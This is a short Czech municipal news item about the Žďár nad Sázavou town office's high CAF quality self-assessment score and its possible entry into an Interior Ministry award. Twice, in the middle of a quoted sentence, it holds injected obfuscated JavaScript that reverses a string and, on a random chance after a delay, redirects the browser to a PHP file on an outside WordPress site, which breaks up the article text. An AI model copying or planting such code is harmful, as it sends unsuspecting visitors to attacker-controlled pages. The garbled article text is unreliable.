Rainbow page separator

Žďárský úřad zvažuje účast v soutěži ministerstva vnitra

Pondělí, 25. července 2016

Budova Městského úřadu ve Žďáře nad Sázavou

Žďár nad Sázavou / Vysoké hodnocení podle kritérií modelu CAF, který slouží ke zvyšování kvality veřejné správy, získal žďárský městský úřad. „Každoroční proces má na starosti takzvaný CAF tým složený z dobrovolníků z řad zaměstnanců většiny odborů a oddělení městského úřadu,“ informovala mluvčí žďárské radnice Nikola Adlerová. Za model CAF se neplatí žádný licenční poplatek a obsahuje soubor devíti kritérií, která umožňují provést sebehodnocení organizace. Hodnotí se předpoklady organizace a její výsledky. Výstup sebehodnocení slouží jako zdroj informací o silných a slabých stránkách úřadu a dále může posloužit pro porovnávání s dalšími úřady v republice i v rámci Evropy. „Díky dlouhodobé práci na kvalitě posky["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovaných služeb se úřadu v roce 2016 opět podařilo získat velmi vysoké hodnocení podle kritérií modelu CAF. Pro ověření a srovnání posky["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovaných služeb úřad zvažuje účast v soutěži Cena Ministerstva vnitra za kvalitu a inovaci ve veřejné správě,“ dodala Nikola Adlerová.